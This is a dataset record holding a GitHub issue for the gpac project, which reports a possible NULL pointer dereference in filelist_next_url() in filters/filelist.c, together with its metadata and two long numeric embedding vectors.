0.0033467120956629515, 0.02550569921731949, 0.02193490043282509, -0.007564261555671692, -0.0008776693139225245, -0.0029386209789663553, 0.0027254661545157433, 0.018626447767019272, 0.0038732225075364113, -0.02117701806128025, 0.0005032821209169924, -0.03127727285027504, 0.006361850071698427, 0.022211819887161255, 0.0028985405806452036, 0.02735668420791626, 0.01808718405663967, 0.0031481320038437843, 0.006099505815654993, 0.0034104762598872185, 0.0209292471408844, 0.00814724899828434, 0.00609586201608181, -0.0027017821557819843, -0.018451550975441933, -0.003009672509506345, -0.006314482074230909, -0.027429556474089622, 0.047251127660274506, 0.001885599922388792, 0.023115450516343117, 0.012833010405302048, -0.013037055730819702, -0.005582104437053204, 0.004798715002834797, -0.006707998923957348, -0.0037784872110933065, -0.00542542664334178, -0.0019675823859870434, -0.006383711937814951, 0.0025250641629099846, -0.001021138858050108, 0.0030880114063620567, 0.002308265771716833, 0.007994215004146099, -0.006190597545355558, 0.0009154723957180977, 0.002025881316512823, -0.005352552980184555, -0.008934281766414642, 0.017970586195588112, -0.0016505831154063344, 0.001161420252174139, -0.0028165578842163086, 0.015011925250291824, -0.011688897386193275, 0.010457336902618408, -0.03352177515625954, 0.026715397834777832, 0.0062889764085412025, 0.0038331421092152596, 0.0016114136669784784, 0.010777979157865047, -0.0031426665373146534, 0.011900230310857296, 0.016964932903647423, -0.013525308109819889, -0.019180284813046455, -0.001759893260896206, 0.003767556045204401, -0.010858139954507351, -0.002244501607492566, 0.011878368444740772, 0.006208815611898899, 0.012381195090711117, 0.007108802441507578, 0.0034432692918926477, 0.031131526455283165, 0.018291229382157326, -0.008489754050970078, -0.017271000891923904, 0.030315345153212547, -0.01664428971707821, 0.010165843181312084, 0.01237390749156475, -0.02693401835858822, -0.004918956197798252, -0.01600300334393978, -0.003403188893571496, -0.0152596952393651, -0.015041074715554714, 0.0058663105592131615, -0.023115450516343117, 0.006092218216508627, 0.015070224180817604, 0.013102642260491848, -0.018772194162011147, 0.03806907683610916, -0.0011413800530135632, -0.008766673505306244, -0.008956143632531166, 0.016498543322086334, -0.010712393559515476, -0.003855004208162427, 0.010573933832347393, -0.008518903516232967, 0.0013053452130407095, -0.012891309335827827, 0.00020188215421512723, 0.003461487591266632, 0.018597297370433807, -0.006642412859946489, 0.003485171590000391, 0.008125387132167816, -0.004026256967335939, 0.008868696168065071, -0.013211951591074467, 0.005953758955001831, 0.01695035956799984, -0.0005142131121829152, -0.008941569365561008, -0.014880753122270107, 0.006977630313485861, -0.006205172277987003, -0.0039788889698684216, -0.0032355801668018103, 0.004798715002834797, 0.006070356350392103, 0.01974869892001152, 0.006540389731526375, -0.014858891256153584, 0.01316822785884142, 0.01267268881201744, -0.008424167521297932, 0.004754990804940462, -0.005603966303169727, -0.008839546702802181, 0.009560992941260338, 0.017693668603897095, 0.009080029092729092, -0.0074913883581757545, 0.013102642260491848, -0.0009346017031930387, 0.003630918450653553, -0.001026604324579239, -0.0013354055117815733, 0.010348026640713215, -0.014101007953286171, 0.006503953132778406, -0.0009259479702450335, 0.007123377174139023, 0.014902615919709206, 0.006518527865409851, -0.014873466454446316, 0.016381945461034775, 0.002047743182629347, 0.0024467252660542727, 0.01969039998948574, 0.005341622047126293, -0.021264465525746346, 0.03241410106420517, -0.0038513606414198875, 0.019238583743572235, 0.011477564461529255, -0.02326119691133499, 0.026657098904252052, 0.008824971504509449, -0.005957402754575014, 0.00838773138821125, 0.05631658434867859, -0.02106042020022869, -0.010756117291748524, 0.0009537309524603188, 0.0023301278706640005, 0.006839171051979065, 0.004306819289922714, -0.01489532832056284, -0.0041574290953576565, -0.0018209246918559074, 0.0074549512937664986, 0.017154404893517494, -0.000757883652113378, -0.007586123421788216, 0.01210427563637495, -0.004357830621302128, 0.01766451820731163, -0.001288037747144699, 0.005968333687633276, -0.02272193320095539, 0.003567154286429286, -0.00900715496391058, 0.014319628477096558, 0.00372383208014071, 0.011266231536865234, 0.00469669234007597, -0.011623311787843704, 0.00036618896410800517, -0.017853988334536552, -0.007378434296697378, -0.006675205659121275, 0.003313919063657522, -0.005046484526246786, 0.02027338743209839, -0.004489003214985132, 0.01587183214724064, -0.00781931821256876, -0.00969216600060463, -0.0022007774095982313, 0.00827113352715969, 0.02664252370595932, 0.0007455862360075116, 0.0014501811238005757, 0.038273122161626816, -0.001666979631409049, -0.018393252044916153, -0.0066169071942567825, 0.0019238584209233522, 0.010566646233201027, -0.0056367595680058, -0.02818744070827961, 0.021628832444548607, 0.0004832418926525861, -0.004616531543433666, 0.0061578042805194855, 0.03110237792134285, -0.0026234432589262724, 0.01094558835029602, -0.0002828399883583188, -0.009918073192238808, -0.011477564461529255, 0.0073419976979494095, 0.02515590563416481 ]
92
null
null
null
null
null
null
null
null
null
[ "gpac", "gpac" ]
In function filelist_next_url() in /src/filters/filelist.c, fentry should be checked before used in case it's NULL. https://github.com/gpac/gpac/blob/9f143de8c6180be433259329ecfac302f39e5df1/src/filters/filelist.c#L439-L446
potential NULL pointer dereference in filters/filelist.c
https://api.github.com/repos/gpac/gpac/issues/1676/comments
1
2021-01-07T02:26:13
2021-01-07T09:53:20Z
https://github.com/gpac/gpac/issues/1676
780,977,246
1,676
false
This is a GitHub Issue repo:gpac owner:gpac Title : potential NULL pointer dereference in filters/filelist.c Issue date: --- start body --- In function filelist_next_url() in /src/filters/filelist.c, fentry should be checked before used in case it's NULL. https://github.com/gpac/gpac/blob/9f143de8c6180be433259329ecfac302f39e5df1/src/filters/filelist.c#L439-L446 --- end body ---
385
[ 0.0036304329987615347, 0.05040666088461876, -0.010675045661628246, 0.023892706260085106, 0.02146804891526699, -0.00040629395516589284, -0.02807360142469406, 0.04450884833931923, -0.0014916558284312487, 0.019554534927010536, -0.04576704651117325, 0.04112743213772774, 0.01963317207992077, 0.0183749720454216, -0.01631728932261467, 0.019698703661561012, -0.013217659667134285, 0.013971269130706787, -0.03816542029380798, -0.021848129108548164, 0.017103664577007294, -0.017182301729917526, -0.014049907214939594, 0.05494142696261406, -0.01694639027118683, 0.01724783331155777, -0.02170396037399769, -0.009875563904643059, -0.0032929468434304, 0.001269668573513627, 0.04529522359371185, 0.00965275801718235, 0.010098370723426342, 0.033814143389463425, 0.03420732915401459, 0.006965975277125835, 0.04789026081562042, 0.03232003003358841, 0.014390669763088226, -0.0033240742050111294, 0.00505901500582695, -0.04794268682599068, -0.04162546992301941, 0.0082569420337677, -0.013302850537002087, 0.021546686068177223, 0.026461532339453697, 0.018768159672617912, -0.0193055160343647, 0.0010697981342673302, 0.02912210114300251, -0.03150743991136551, 0.010399814695119858, -0.06946315616369247, -0.009180932305753231, -0.03994787111878395, 0.025032950565218925, 0.0101180300116539, -0.032975342124700546, 0.05724812671542168, 0.0062156422063708305, 0.031455013900995255, -0.0014244862832129002, 0.0037025173660367727, 0.023683005943894386, 0.02446938119828701, -0.03968574479222298, 0.005543946288526058, -0.01291621569544077, 0.007005294319242239, -0.0042136614210903645, -0.013486337848007679, -0.010314623825252056, 0.033604443073272705, 0.010904405266046524, -0.03441702947020531, 0.017169196158647537, 0.013401146978139877, -0.0014212096575647593, -0.0067169563844799995, -0.033185042440891266, -0.015242576599121094, -0.02665812522172928, -0.0038434097077697515, -0.013447019271552563, -0.014731432311236858, -0.0013278275728225708, -0.05897815525531769, -0.016343502327799797, -0.013283191248774529, -0.013342169113457203, 0.018204590305685997, 0.016985708847641945, 0.0031061829067766666, 0.017523065209388733, -0.025334393605589867, -0.02107486128807068, -0.008473195135593414, -0.02528196945786476, -0.009986967779695988, -0.03446945548057556, -0.046212662011384964, 0.003233968745917082, 0.02107486128807068, 0.0035059235524386168, 0.007719585206359625, 0.016893964260816574, -0.030170602723956108, 0.015937207266688347, 0.11376230418682098, 0.03808678314089775, -0.028230875730514526, -0.011218955740332603, -0.008787744678556919, 0.02241169847548008, 0.025347499176859856, -0.011382783763110638, -0.027103738859295845, 0.022057829424738884, -0.0035583486314862967, -0.013971269130706787, -0.024298999458551407, 0.00017089329776354134, 0.03420732915401459, -0.014561050571501255, 0.04608159884810448, -0.01589788869023323, 0.017287151888012886, -0.048152387142181396, -0.008610810153186321, -0.06007907912135124, -0.020720992237329483, 0.026291150599718094, -0.028755126520991325, -0.007129803765565157, 0.017208514735102654, -0.016448352485895157, 0.016959495842456818, -0.001282774843275547, -0.02097001112997532, -0.07302805781364441, -0.03716934472322464, 0.03494127839803696, 0.009574119932949543, -0.025164011865854263, -0.036933429539203644, 0.004154683090746403, -0.021415622904896736, -0.04770677536725998, -0.01918756030499935, 0.00031966977985575795, -0.004230044316500425, 0.02870270237326622, -0.0332636795938015, 0.04587189853191376, 0.011317252181470394, 0.005209736991673708, 0.03242487832903862, -0.02200540527701378, -0.0038565159775316715, -0.009816586039960384, -0.039921656250953674, -0.006415512412786484, -0.02747071348130703, 0.001482645282521844, -0.0000788935212767683, -0.005304757505655289, 0.016042057424783707, -0.04820481315255165, 0.02011810429394245, -0.025164011865854263, 0.010681599378585815, -0.005927304737269878, -0.007981710135936737, -0.04820481315255165, -0.020052572712302208, 0.015504701063036919, 0.04380111023783684, -0.020419547334313393, -0.032687004655599594, -0.016671158373355865, -0.022857312113046646, -0.028047388419508934, -0.03208411484956741, -0.029069676995277405, -0.0032274157274514437, 0.04049833118915558, -0.0009313633781857789, -0.001394178019836545, -0.024744613096117973, -0.029358014464378357, -0.012103627435863018, -0.001590771833434701, 0.004659274127334356, 0.009515142068266869, -0.012287115678191185, -0.059030577540397644, -0.028021177276968956, -0.014180969446897507, -0.0027244631201028824, 0.02530818060040474, -0.0056553496979177, -0.002237893408164382, 0.038244057446718216, -0.01538674533367157, 0.02487567439675331, 0.003284755628556013, 0.04799511283636093, -0.02003946714103222, -0.03787708282470703, -0.020589929074048996, -0.03148122876882553, 0.032057903707027435, 0.012372306548058987, -0.0019348111236467957, 0.015478488989174366, 0.013021065853536129, 0.035465531051158905, -0.0017201962182298303, 0.004282469395548105, 0.014561050571501255, 0.01208396814763546, 0.013414253480732441, -0.011454868130385876, -0.029777415096759796, -0.03457430377602577, 0.02002635970711708, 0.009986967779695988, 0.016854645684361458, 0.021651536226272583, 0.0008310185512527823, 0.0015719316434115171, -0.0015088578220456839, 0.002021640073508024, -0.011435208842158318, 0.0026097833178937435, 0.004387319553643465, -0.054784152656793594, -0.022044723853468895, -0.012477155774831772, 0.02789011411368847, 0.04474475979804993, -0.020275378599762917, 0.0279687512665987, 0.01327663753181696, 0.001603878103196621, -0.02435142546892166, -0.04616023600101471, -0.012018437497317791, 0.042175933718681335, -0.007608181796967983, -0.0021182987838983536, -0.010720917955040932, -0.017536170780658722, -0.004406978841871023, -0.035780079662799835, 0.0005156492698006332, 0.016068270429968834, -0.03200547769665718, -0.025950387120246887, -0.007300185039639473, -0.013165234588086605, 0.0006749721942469478, -0.03098319098353386, 0.0045904661528766155, -0.03842754289507866, -0.006428618915379047, -0.005950240418314934, 0.0039810254238545895, -0.0017300258623436093, 0.03559659421443939, 0.017496852204203606, -0.020838947966694832, -0.0070839314721524715, 0.001561282784678042, -0.014928026124835014, 0.017837615683674812, 0.006749722175300121, -0.005737263709306717, 0.030223026871681213, -0.006130451336503029, 0.018034208565950394, -0.0420972965657711, 0.030091965571045876, 0.022883523255586624, 0.014849388971924782, 0.02159911021590233, 0.013800888322293758, -0.012870344333350658, 0.027444500476121902, 0.024705292657017708, 0.01058985572308302, -0.02187434211373329, -0.001289327978156507, -0.006893890909850597, 0.03397141769528389, 0.016186226159334183, 0.022477230057120323, -0.033211253583431244, 0.025465456768870354, 0.00434144726023078, 0.008551832288503647, -0.024534912779927254, -0.0068152532912790775, -0.02394513040781021, 0.01682843267917633, -0.005491521675139666, -0.004328341223299503, -0.0026982505805790424, -0.02332913689315319, 0.025164011865854263, -0.043722473084926605, -0.009226804599165916, -0.038270268589258194, -0.0006368821486830711, -0.02104864828288555, -0.007654053624719381, -0.02726101316511631, 0.009502035565674305, 0.013813994824886322, -0.0018430673517286777, -0.005196630489081144, -0.010825768113136292, -0.01549159549176693, 0.006723509635776281, -0.035255830734968185, -0.01234609354287386, 0.006559681612998247, -0.07549203932285309, -0.0059010921977460384, 0.020419547334313393, -0.004154683090746403, 0.019659385085105896, -0.026474637910723686, 0.011664568446576595, -0.0514027364552021, -0.03596356883645058, 0.016972601413726807, 0.04335549473762512, -0.010812661610543728, -0.012765494175255299, -0.0036533689126372337, 0.05625205114483833, -0.013112809509038925, -0.0014523370191454887, -0.018007995560765266, 0.006435172166675329, -0.010334283113479614, 0.02838815189898014, -0.013787781819701195, 0.0006516266730614007, 0.039607107639312744, -0.016671158373355865, -0.0042955754324793816, 0.018125953152775764, 0.021350091323256493, -0.022542761638760567, -0.021520473062992096, 0.002676952863112092, 0.02190055511891842, 0.03368308022618294, -0.04935816302895546, -0.005688115488737822, 0.02601591870188713, 0.0004730539512820542, 0.024312105029821396, 0.01042602676898241, -0.006736615672707558, 0.007372269406914711, 0.0010558727663010359, -0.041232284158468246, 0.021310772746801376, -0.040209993720054626, -0.022280635312199593, -0.012680303305387497, 0.02137630432844162, 0.009049870073795319, 0.04028863087296486, -0.023171860724687576, -0.017693446949124336, -0.021664641797542572, 0.006808700039982796, -0.00412847101688385, -0.06275275349617004, 0.036933429539203644, 0.01652698963880539, -0.02862406335771084, 0.03378792852163315, -0.0187812652438879, -0.03252973034977913, -0.030013326555490494, 0.06207123026251793, -0.022123361006379128, -0.05321140214800835, -0.010825768113136292, -0.0022919566836208105, -0.03648781776428223, -0.0013835291611030698, -0.0036107737105339766, -0.030642427504062653, 0.03273942694067955, -0.02260829322040081, -0.008296260610222816, 0.006543298717588186, -0.033420953899621964, 0.02809981442987919, 0.02125834859907627, -0.009102295152842999, 0.014154757373034954, 0.01032773032784462, 0.019659385085105896, -0.04736601188778877, -0.015190151520073414, 0.0036828580778092146, 0.04602917283773422, 0.033499591052532196, -0.0016153460601344705, 0.00011570366768864915, -0.048073749989271164, -0.0035976674407720566, -0.007693372666835785, 0.00330605311319232, 0.011716993525624275, 0.02094379812479019, 0.03730040788650513, 0.022254424169659615, -0.019449684768915176, 0.036199480295181274, 0.022700035944581032, -0.02187434211373329, 0.0006188610568642616, -0.01105512771755457, 0.002817845204845071, -0.01218881830573082, 0.023093223571777344, -0.024836355820298195, -0.0035321360919624567, -0.058086927980184555, -0.00965275801718235, -0.0025573582388460636, -0.041677895933389664, 0.040341056883335114, -0.011127212084829807, 0.04243806004524231, 0.01630418375134468, -0.06542643159627914, -0.025635838508605957, -0.014076119288802147, 0.027103738859295845, -0.02127145417034626, 0.012516475282609463, 0.010884745977818966, -0.010059052146971226, -0.024849463254213333, 0.01838807761669159, 0.03176956623792648, -0.004036726895719767, -0.01027530524879694, 0.028545426204800606, 0.01868952251970768, -0.05709085240960121, 0.016133802011609077, -0.029095890000462532, -0.006933209486305714, 0.0045445943251252174, 0.007005294319242239, 0.00923991110175848, -0.015216363593935966, 0.013099703006446362, -0.027208589017391205, -0.028728913515806198, 0.00809966679662466, 0.004092428367584944, 0.025242650881409645, 0.0009493844700045884, 0.027077525854110718, -0.024233467876911163, 0.002221510512754321, 0.00991488341242075, -0.030485153198242188, -0.02715616300702095, -0.018610883504152298, 0.011920140124857426, 0.01950210891664028, 0.0036828580778092146, -0.0037909846287220716, 0.008433875627815723, -0.02011810429394245, -0.021638428792357445, 0.001407284289598465, 0.0004320968873798847, 0.03428596630692482, -0.00861736387014389, -0.02880755253136158, -0.007300185039639473, -0.005619307514280081, 0.004718252457678318, -0.012221584096550941, 0.026894038543105125, 0.007929285056889057, 0.0024852738715708256, -0.007293631788343191, 0.02975120209157467, -0.024312105029821396, -0.014076119288802147, -0.003977749031037092, -0.02229374274611473, -0.0187812652438879, 0.015190151520073414, -0.03368308022618294, -0.041441984474658966, 0.006926656700670719, -0.017929358407855034, -0.06458763033151627, 0.010747130028903484, -0.0022297019604593515, 0.03863724321126938, 0.016448352485895157, -0.0064744907431304455, -0.006756275426596403, -0.024390744045376778, 0.006972528528422117, 0.00661210622638464, 0.027523139491677284, -0.008623916655778885, 0.045190371572971344, -0.021717067807912827, -0.007739244494587183, -0.0025802941527217627, -0.039371196180582047, -0.01095027755945921, 0.0062680672854185104, 0.0009362782002426684, 0.04272639751434326, 0.0010829044040292501, -0.01027530524879694, 0.005203183740377426, 0.011212402023375034, 0.002676952863112092, -0.0061173452995717525, -0.04343413561582565, 0.049620285630226135, -0.04346034675836563, -0.008728766813874245, -0.026356682181358337, 0.05813935399055481, -0.0014457838842645288, 0.02436453104019165, -0.019973935559391975, -0.03176956623792648, -0.009436504915356636, -0.012201924808323383, 0.0020134486258029938, 0.021336985751986504, -0.006258237641304731, 0.023473305627703667, 0.0021314050536602736, 0.010983043350279331, 0.025884857401251793, -0.0038827285170555115, 0.015976525843143463, -0.004108811262995005, 0.01177597139030695, -0.054889000952243805, -0.007300185039639473, -0.010294964537024498, 0.01859777793288231, 0.0020183634478598833, -0.046317510306835175, 0.016042057424783707, 0.017693446949124336, -0.015727506950497627, 0.024430062621831894, -0.02334224246442318, -0.004973824135959148, 0.0016079738270491362, -0.009305441752076149, -0.01579303853213787, -0.022044723853468895, -0.01600273884832859, -0.005832284223288298, -0.01326353196054697, -0.01559644564986229, 0.017942465841770172, 0.016146907582879066, 0.0033617548178881407, 0.0279687512665987, -0.0069856345653533936, -0.005386671517044306, -0.012883449904620647, -0.017523065209388733, 0.01269340980798006, 0.020616142079234123, -0.024036874994635582, -0.00017539857071824372, 0.00032437985646538436, -0.0006295098573900759, 0.017011921852827072, 0.0011664568446576595, -0.027759050950407982, -0.02149426005780697, 0.02311943657696247, -0.018230803310871124, -0.05782480537891388, 0.01827012188732624, 0.02024916559457779, 0.01806042157113552, -0.025950387120246887, -0.05331625044345856, 0.041782744228839874, -0.0056520733051002026, 0.02985605224967003, 0.05389292538166046, 0.007647500839084387, 0.019253090023994446, 0.021219030022621155, -0.0005770848365500569, 0.0003868393541779369, 0.014076119288802147, 0.02252965420484543, 0.03255594149231911, -0.026776082813739777, 0.019239984452724457, -0.01414165087044239, 0.030721064656972885, 0.037536319345235825, -0.004865697585046291, -0.018623990938067436, -0.017483746632933617, -0.007719585206359625, -0.015832357108592987, 0.005213013384491205, -0.010334283113479614, -0.04018378257751465, -0.040629394352436066, 0.015504701063036919, 0.018335653468966484, 0.02373543009161949, -0.012660644017159939, 0.016474563628435135, 0.011225508525967598, 0.0007503331871703267, -0.03677615523338318, 0.029489077627658844, -0.011664568446576595, -0.01110099907964468, 0.00487552722916007, 0.003908941056579351, 0.017169196158647537, 0.020157422870397568, -0.04049833118915558, -0.013538762927055359, 0.01672358252108097, 0.006549851503223181, 0.035884931683540344, -0.017536170780658722, 0.007326397579163313, 0.043329283595085144, -0.009580673649907112, -0.018322546035051346, 0.005481691565364599, -0.024089299142360687, -0.019056497141718864, -0.02975120209157467, -0.005583265330642462, 0.0122412433847785, -0.0021641706116497517, -0.0207603108137846, -0.009941095486283302, -0.0005471862386912107, 0.00794239155948162, -0.03913528099656105, -0.003320797812193632, 0.015648869797587395, -0.011998778209090233, -0.0013925397070124745, -0.01993461698293686, -0.0016341863665729761, -0.008643575944006443, -0.010629174299538136, 0.006431895308196545, -0.02996090240776539, 0.022464124485850334, -0.0009043316822499037, -0.006091132760047913, 0.015714401379227638, -0.01172354631125927, -0.0005050004692748189, -0.045164160430431366, -0.00007382508192677051, -0.006730062887072563, -0.007300185039639473, 0.013525656424462795, 0.04812617227435112, 0.01403680071234703, -0.03530825674533844, 0.03347337990999222, 0.0022559144999831915, -0.025937281548976898, 0.0025704645086079836, -0.018217695876955986, 0.0032782023772597313, -0.0007048708503134549, -0.013905738480389118, -0.011841502971947193, 0.03921391814947128, -0.008754979819059372, -0.010596408508718014, 0.005560329183936119, -0.021022435277700424, -0.03208411484956741, -0.01450862642377615, -0.024613549932837486, 0.016671158373355865, -0.0010591493919491768, -0.011808737181127071, 0.0046265083365142345, -0.021087966859340668, -0.008597704581916332, 0.008591150864958763, -0.01156627107411623, -0.021310772746801376, -0.01642213948071003, -0.00451510539278388, -0.005088503938168287, -0.021533578634262085, 0.019344834610819817, -0.012542687356472015, 0.013086597435176373, 0.014810069464147091, -0.02726101316511631, 0.00289320619776845, 0.021848129108548164, -0.00011590845679165795, -0.025570306926965714, -0.013879525475203991, -0.0006319673266261816, -0.00029284291667863727, 0.0159896332770586, 0.00034854450495913625, 0.004819825757294893, -0.01859777793288231, -0.011644909158349037, -0.028991039842367172, 0.0012606580276042223, -0.02809981442987919, -0.00981003325432539, -0.01042602676898241, 0.0061075156554579735, 0.021966086700558662, 0.01327663753181696, -0.0003663608222268522, 0.0377984419465065, -0.03310640528798103, -0.02322428673505783, -0.012739281170070171, 0.028676489368081093, 0.0037090706173330545, 0.0071101440116763115, -0.013080043718218803, -0.006137004587799311, -0.018427396193146706, -0.007713031955063343, 0.006749722175300121, 0.016291076317429543, 0.0037909846287220716, -0.013551869429647923, -0.024416955187916756, 0.01408922579139471, -0.013486337848007679, -0.010393260978162289, -0.013125916011631489, -0.02943665161728859, -0.01796867698431015, 0.032477304339408875, -0.0038204737938940525, 0.009521695785224438, 0.03449566662311554, 0.018125953152775764, 0.007365716155618429, -0.03355201706290245, 0.0017185579054057598, -0.0038958347868174314, -0.005222843028604984, 0.039607107639312744, 0.005003313533961773, 0.01828322745859623, 0.01300140656530857, 0.011474527418613434, 0.007391928695142269, -0.029095890000462532, -0.017313364893198013, -0.005481691565364599, -0.015373638831079006, -0.03654024377465248, -0.019855977967381477, 0.00601577153429389, 0.03895179554820061, -0.004823102615773678, -0.027732837945222855, 0.019947722554206848, -0.006874231621623039, -0.010209773667156696, -0.021087966859340668, -0.005452202633023262, 0.0015080386074259877, -0.01733957789838314, 0.0057765827514231205, -0.029777415096759796, 0.0016374628758057952, -0.00111567007843405, -0.0308783408254385, 0.004895186983048916, 0.008119326084852219, -0.0016841539181768894, 0.015570232644677162, 0.0131717873737216, -0.037221767008304596, -0.011848055757582188, 0.01889922097325325, -0.02778526395559311, -0.005258885212242603, 0.004010514356195927, -0.04998726397752762, -0.0020773415453732014, -0.013918844051659107, -0.012778599746525288, 0.016028951853513718, 0.025570306926965714, -0.018139058724045753, -0.00018973354599438608, 0.035884931683540344, 0.0211666040122509, -0.0044626803137362, -0.01891232840716839, 0.0038204737938940525, -0.011114105582237244, 0.00014334968000184745, -0.014102332293987274, 0.023211181163787842, -0.00451510539278388, -0.009888670407235622, -0.010681599378585815, -0.025635838508605957, -0.012876897118985653, -0.01408922579139471, -0.00012154004798503593, -0.010629174299538136, -0.009161273017525673, 0.02828330174088478, 0.0027179098688066006, 0.03840133175253868, 0.027601776644587517, 0.008532173000276089, -0.02488878183066845, 0.014600370079278946, -0.006133728194981813, -0.0013179979287087917, 0.013761569745838642, -0.019751127809286118, 0.05142895132303238, 0.013918844051659107, -0.016055164858698845, 0.016880858689546585, 0.015085301361978054, 0.006078026257455349, 0.0010747130727395415, -0.03798193112015724, -0.001276221708394587, 0.0043840426951646805, -0.009036763571202755, -0.015727506950497627, 0.0016751433722674847, 0.011703887023031712, 0.004135023802518845, 0.004642891231924295, -0.013551869429647923, -0.03677615523338318, 0.002049490809440613, -0.01654009521007538, -0.0007957955240271986, 0.01486249454319477, -0.008696001023054123, 0.009207145310938358, -0.01275894045829773, -0.0359373539686203, 0.007195334881544113, -0.03766738250851631, -0.008283154107630253, 0.012359200045466423, 0.01047845184803009, 0.02252965420484543, -0.03378792852163315, -0.026474637910723686, 0.013270084746181965, 0.030852127820253372, 0.005845390260219574, -0.02053750306367874, -0.013230766169726849, 0.008368344977498055, 0.0006319673266261816, -0.003320797812193632, 0.00861736387014389, -0.002739207586273551, 0.008348685689270496, 0.005543946288526058, 0.022595185786485672, 0.009554460644721985, -0.021507367491722107, 0.03530825674533844, 0.02435142546892166, -0.018112845718860626, -0.019777340814471245, -0.04057696834206581, -0.03150743991136551, -0.015295001678168774, -0.02218889258801937, 0.03234624117612839, -0.0113106993958354, 0.04616023600101471, -0.0003391243808437139, 0.010773343034088612, -0.011376230977475643, 0.005412884056568146, 0.02002635970711708, -0.011743205599486828, -0.007398481946438551, 0.010707811452448368, 0.0015850379131734371, 0.011500740423798561, -0.008138985373079777, -0.02137630432844162, -0.010570195503532887, -0.003186458721756935, 0.024443168193101883, -0.0014867410063743591, -0.023630579933524132, -0.019803553819656372, -0.020065678283572197, -0.028650276362895966, 0.013499444350600243, 0.025871749967336655, 0.018086634576320648, -0.002552443416789174, -0.0037320065312087536, 0.002496741944923997, 0.044430211186409, 0.01408922579139471, -0.02870270237326622, 0.0027867178432643414, -0.0023443815298378468, -0.01631728932261467, 0.00794239155948162, -0.043617621064186096, -0.033709291368722916, 0.020170528441667557, -0.013165234588086605, 0.002346019959077239, -0.002739207586273551, 0.012817919254302979, 0.00949548278003931, 0.02313254214823246, -0.007850647903978825, -0.013682931661605835, -0.011900480836629868, 0.008538725785911083, -0.002108468906953931, -0.023997556418180466, -0.0222151055932045, -0.0018774712225422263, 0.0026785910595208406, 0.012070862576365471, 0.05588507652282715, 0.042202144861221313, 0.019698703661561012, 0.07061651349067688, 0.008053794503211975, -0.030013326555490494, -0.020380228757858276, 0.020314697176218033, 0.0011427017161622643, 0.013099703006446362, 0.02933180145919323, -0.009639651514589787, 0.006887337658554316, -0.02404998056590557, -0.010091817937791348, 0.03116667829453945, 0.018335653468966484, 0.0026818676851689816, -0.0036959643475711346, 0.026055237278342247, 0.007267419248819351, -0.016474563628435135, 0.04296230897307396, 0.02559651806950569, -0.016710476949810982, -0.03399762883782387, -0.012110181152820587, 0.005475138779729605, -0.018453609198331833, -0.020485078915953636, 0.03735283017158508, -0.016238652169704437, -0.021507367491722107, 0.028152238577604294, -0.0032159476540982723, 0.007837541401386261, 0.015648869797587395, 0.019226878881454468, -0.011966012418270111, 0.013591188006103039, 0.0040170676074922085, 0.005914198234677315, 0.0014957515522837639, -0.05318518728017807, -0.030406516045331955, 0.02466597408056259, 0.01993461698293686, 0.0013925397070124745, -0.02807360142469406, 0.016042057424783707, -0.008728766813874245, 0.005160588305443525, -0.006848019082099199, 0.007103591226041317, -0.0016841539181768894, -0.005281821358948946, 0.010249092243611813, 0.027103738859295845, 0.007057718932628632, -0.00021768672741018236, 0.014823175966739655, 0.033604443073272705, 0.0027605053037405014, -0.02954150177538395, 0.01496734470129013, -0.023696111515164375, -0.027496926486492157, 0.012896556407213211, 0.0407080315053463, -0.007352610118687153, -0.03947604447603226, -0.010799555107951164, -0.008021028712391853, 0.01796867698431015, 0.008211069740355015, 0.0036894110962748528, 0.023276710882782936, -0.011127212084829807, 0.023604368790984154, -0.013460125774145126, 0.03559659421443939, 0.007241206709295511, 0.012962087988853455, 0.014836282469332218, 0.016160015016794205, -0.0060190483927726746, -0.004823102615773678, 0.003186458721756935, -0.023604368790984154, -0.041441984474658966, 0.0034764346200972795, -0.0018365142168477178, -0.021009329706430435, 0.005232673138380051, -0.005894538946449757, 0.020275378599762917, -0.005009866785258055, 0.013512550853192806, 0.004141577053815126, 0.028886189684271812, -0.0036238799802958965, -0.010937171056866646, 0.004708422813564539, -0.0065465751104056835, 0.0032405219972133636, -0.011612143367528915, -0.008545279502868652, -0.023932024836540222, -0.006540021859109402, -0.014796963892877102, -0.01083887368440628, -0.0037942612543702126, -0.04676312208175659, 0.005491521675139666, 0.015190151520073414, -0.008768085390329361, 0.009672417305409908, -0.00217072363011539, -0.020262273028492928, 0.013342169113457203, 0.0022591908928006887, -0.02562273107469082, -0.02786390110850334, -0.012857237830758095, 0.012038096785545349, 0.030852127820253372, 0.019790448248386383, -0.04133713245391846, -0.0026720380410552025, 0.011926693841814995, 0.015465382486581802, 0.01747063919901848, -0.017837615683674812, 0.002614698139950633, 0.013669825159013271, 0.009534801356494427, 0.004377489909529686, -0.008414216339588165, 0.007686819415539503, 0.012575453147292137, 0.004030174110084772, -0.024128617718815804, -0.025478562340140343, 0.012359200045466423, -0.0037156236357986927, 0.00970518309623003, -0.0013573167379945517, 0.010098370723426342, -0.020196741446852684, 0.013433912768959999, 0.024207254871726036, -0.013578081503510475, -0.016160015016794205, 0.01786382682621479, 0.007536097429692745, -0.00025475287111476064, 0.014495519921183586, 0.01001317985355854, 0.004256256856024265, 0.00217072363011539, 0.02024916559457779, 0.01398437563329935, -0.012516475282609463, -0.010661940090358257, -0.008709107525646687, -0.0029046740382909775, -0.0019905127119272947, -0.015426063910126686, 0.0035583486314862967, -0.012785153463482857, -0.005668455734848976, 0.041992444545030594, 0.00923991110175848, -0.03182199224829674, -0.001158265396952629, -0.025019843131303787, -0.004501998890191317, 0.02817845158278942, -0.006533469073474407, -0.0035747315268963575, 0.013643613085150719, -0.0016612180043011904, -0.00008990072819869965, 0.005334246437996626, -0.019646277651190758, -0.012018437497317791, 0.003258543089032173, -0.0013868057867512107, 0.024312105029821396, -0.011422102339565754, -0.012699962593615055, -0.014993557706475258, 0.017903147265315056, 0.01032773032784462, 0.042490482330322266, 0.015648869797587395, 0.0010779895819723606, -0.005183524452149868, -0.009357866831123829, -0.008361791260540485, 0.03394520282745361, -0.020170528441667557, 0.01486249454319477, 0.00516386516392231, -0.016055164858698845, -0.011087892577052116, 0.012929322198033333, -0.0006876689149066806, 0.02747071348130703, -0.012215031310915947, 0.013892631977796555, -0.01568818837404251, -0.006648148410022259, -0.025242650881409645, -0.022162679582834244, -0.0009051508386619389, 0.002686782507225871, 0.018728841096162796, 0.02838815189898014, 0.027837688103318214, 0.03520340472459793, 0.007437800522893667, -0.004338170867413282, -0.005170418415218592, -0.004944335203617811, 0.012365752831101418, -0.010720917955040932, 0.010465346276760101, 0.004931229166686535, -0.01765412837266922, 0.02014431543648243, 0.01058330200612545, 